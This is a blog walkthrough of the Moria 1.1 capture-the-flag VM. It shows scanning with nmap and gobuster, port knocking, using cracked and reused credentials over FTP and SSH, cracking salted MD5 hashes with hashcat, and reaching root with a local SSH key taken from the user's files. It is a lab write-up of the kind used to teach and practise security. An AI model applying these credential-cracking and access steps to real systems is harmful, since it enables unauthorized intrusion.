CTF Walkthrough: Moria 1.1

Before I get started, I would like to clarify that this challenge is less hacking (no exploits or anything of that nature needed), and more capture the flag, where each step will give you a clue to get to the next step. This one drove me nuts in a couple spots, and because I wasn’t in the right mindset going in, I did ask a friend who had completed it for a hint. Twice. Each time he was able to say something that got me back on track, I was pretty much overthinking it each time.

Anyway, off we go, let’s get started with Moria 1.1, available at VulnHub. The goal of this challenge is to get root and read the flag.

Also, to be completely transparent, I spent a lot of time going down dead ends on this one, and I’m only (mostly) writing up the proper ways to get through this challenge to keep it simple and straightforward.

As always, we start with port discovery.

root@kali:~# nmap -A -T4 -sS

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-11 21:52 EST
Nmap scan report for
Host is up (0.00052s latency).
Not shown: 997 closed ports
21/tcp open  ftp     vsftpd 2.0.8 or later
22/tcp open  ssh     OpenSSH 6.6.1 (protocol 2.0)
| ssh-hostkey: 
|   2048 47:b5:ed:e3:f9:ad:96:88:c0:f2:83:23:7f:a3:d3:4f (RSA)
|   256 85:cd:a2:d8:bb:85:f6:0f:4e:ae:8c:aa:73:52:ec:63 (ECDSA)
|_  256 b1:77:7e:08:b3:a0:84:f8:f4:5d:f9:8e:d5:85:b9:34 (EdDSA)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Gates of Moria
MAC Address: 08:00:27:E5:47:B0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop

1   0.52 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.88 seconds

Let’s poke at FTP first (I didn’t do this in exactly this order myself, but it makes more sense this way).

root@kali:~# ftp
Connected to
220 Welcome Balrog!
Name ( 

Welcome Balrog? Is that my name now? Sure, I’ll be Balrog. Unfortunately no password that I tried worked (of course), but we’ll just keep this in mind for later.

Opening port 80 in a browser shows us just an image. Being a LOTR fan, I immediately recognize it as a drawing of the magical door to get into the Dwarf caves. Gandolf had to say “friend” in Elvish to enter, which is “Mellon”, which is basically what the text says. (Yes, I tried, and no, “Mellon” is not a pasword, not exactly anyway, but we’ll get there.) The source for the page reveals nothing of interest.

So lets run gobuster on it.

root@kali:~# gobuster -u -w /usr/share/wordlists/dirb/big.txt 

Gobuster v1.2                OJ Reeves (@TheColonial)
[+] Mode         : dir
[+] Url/Domain   :
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/big.txt
[+] Status codes : 204,301,302,307,200
/w (Status: 301)

And then open in the browser. And then, and then, etc, etc, etc, until we end up here:

It looks like refreshing this page will pick one of these messages at random.

Balin: "Be quiet, the Balrog will hear you!" 
Telchar to Thrain:"That human is slow, don't give up yet" 
"Eru! Save us!" 
Ori:"Will anyone hear us?" 
Maeglin:"The Balrog is not around, hurry!" 
"We will die here.." 
Nain:"Will the human get the message?" 
Fundin:"That human will never save us!" 
"Knock knock" 
Oin:"Stop knocking!" 
"Is this the end?" 
"Too loud!" 

Hmmmm, “Knock knock”? Message? Too loud? Balrog will hear you? (Remember, FTP called us Balrog. So they’re doing something that they’re afraid I will hear? Maybe I need to listen to something. But what can I do to listen to something the server is doing?

I thought maybe there should be some port knocking to open up a service/port on the server, so I ran the following to knock on those eight ports in order.

for x in 77 101 108 108 111 110 54 57; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x; done

Another nmap scan showed nothing new, but eventually I realized that those numbers fall in the ASCII range, whereas port knocking could go up to port 65535. So I converted those numbers to ASCII characters and ended up with “Mellon69”. (“Mellon” is Elvish for “friend”, which is mentioned in the image of the gate from the index page on port 80.)

So now we have a potential user name (Ballrog), and maybe a password (Mellon69). So let’s try to use SSH.

root@kali:~# ssh Balrog@
Balrog@'s password: Mellon69
Last login: Sat Nov 11 11:09:26 2017


Connection to closed.

Okay, that seems like a clue, and that seems like a valid account at least. I checked the browser (the picture of the gate), no change, so let’s try this same account information with FTP.

root@kali:~# ftp
Connected to
220 Welcome Balrog!
Name ( Balrog
331 Please specify the password.
Password: Mellon69
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Nice, we’re in. I poked around for an embarrassingly long time before getting the bright idea to look in the web root to see if there was anything gobuster didn’t pick up.

ftp> cd /var/www/html/
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0              23 Mar 12  2017 QlVraKW4fbIkXau9zkAPNGzviT3UKntl
-r--------    1 48       48             85 Mar 12  2017 index.php
-r--------    1 48       48         161595 Mar 11  2017 moria.jpg
drwxr-xr-x    3 0        0              15 Mar 12  2017 w
226 Directory send OK.

Yyyyyup. Let’s go there (and view the source).

<style type="text/css">
.tg  {border-collapse:collapse;border-spacing:0;}
.tg td{font-family:Arial, sans-serif;font-size:14px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;}
.tg th{font-family:Arial, sans-serif;font-size:14px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;}
.tg .tg-yw4l{vertical-align:top}
<table class="tg">
    <th class="tg-yw4l"><b>Prisoner's name</b><br></th>
    <th class="tg-yw4l"><b>Passkey</b></th>
    <td class="tg-yw4l">Balin<br></td>
    <td class="tg-yw4l">c2d8960157fc8540f6d5d66594e165e0</td>
    <td class="tg-yw4l">Oin</td>
    <td class="tg-yw4l">727a279d913fba677c490102b135e51e</td>
    <td class="tg-yw4l">Ori</td>
    <td class="tg-yw4l">8c3c3152a5c64ffb683d78efc3520114</td>
    <td class="tg-yw4l">Maeglin</td>
    <td class="tg-yw4l">6ba94d6322f53f30aca4f34960203703</td>
    <td class="tg-yw4l">Fundin</td>
    <td class="tg-yw4l">c789ec9fae1cd07adfc02930a39486a1</td>
    <td class="tg-yw4l">Nain</td>
    <td class="tg-yw4l">fec21f5c7dcf8e5e54537cfda92df5fe</td>
    <td class="tg-yw4l">Dain</td>
    <td class="tg-yw4l">6a113db1fd25c5501ec3a5936d817c29</td>
    <td class="tg-yw4l">Thrain</td>
    <td class="tg-yw4l">7db5040c351237e8332bfbba757a1019</td>
    <td class="tg-yw4l">Telchar</td>
    <td class="tg-yw4l">dd272382909a4f51163c77da6356cc6f</td>





Okay, a list of usernames and hashed passwords. Also a very useful bit of information in the comment. Basically the author took the password, MD5 encoded it, appended a random six character string (the salt), and the ran it through MD5 again. I did quite a bit of Google searching to find the easiest way to decrypt this (did you know Google results span multiple pages? I think I went to “Page 2” for this), before I found that hashcat has a mode built in that will handle this. So let’s set up a text file with the hashes and salts that hashcat can understand.


The mode we’ll want to use is 2611.

root@kali:~/CTF/Moria# hashcat -m 2611 --force --show accounts.txt /usr/share/wordlists/rockyou.txt

And matching up the results with the account names yields the following:


Let’s go ahead and give these accounts a shot. (Skipping all the ones that didn’t work, because that’s boring.)

root@kali:~/CTF/Moria# ssh Ori@
Ori@'s password: spanky
Last login: Sat Nov 11 17:12:27 2017 from ::1
-bash-4.2$ id
uid=1002(Ori) gid=1003(notBalrog) groups=1003(notBalrog)

Nice, we’re in! Hopefully we’re almost done, this one is taking me a while to get through!

Okay, I spent a long time here. I tried running a ton of privilege escalation cracks, shortcuts, hacks, anything I could think of, but nothing worked. Eventually I asked my friend for a clue, and he pointed me in the right direction, telling me to look in ~/.ssh/known_hosts. I of course already took a look at this file, but I failed to notice the irregularity in the file.

Basically, if you see in that file, (or localhost), then that user has logged in to the machine locally using SSH. The only reasons to do that are to test the SSH server, or maybe to log in as root if the current user can’t sudo?

-bash-4.2$ cat ~/.ssh/known_hosts ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=
-bash-4.2$ ssh root@ -i ~/.ssh/id_rsa
Last login: Sat Nov 11 17:15:09 2017 from
[root@Moria ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@Moria ~]# cat /root/flag.txt 
“All that is gold does not glitter,
Not all those who wander are lost;
The old that is strong does not wither,
Deep roots are not reached by the frost.

From the ashes a fire shall be woken,
A light from the shadows shall spring;
Renewed shall be blade that was broken,
The crownless again shall be king.” 

All That is Gold Does Not Glitter by J. R. R. Tolkien

I hope you suff.. enjoyed this VM. It wasn't so hard, was it?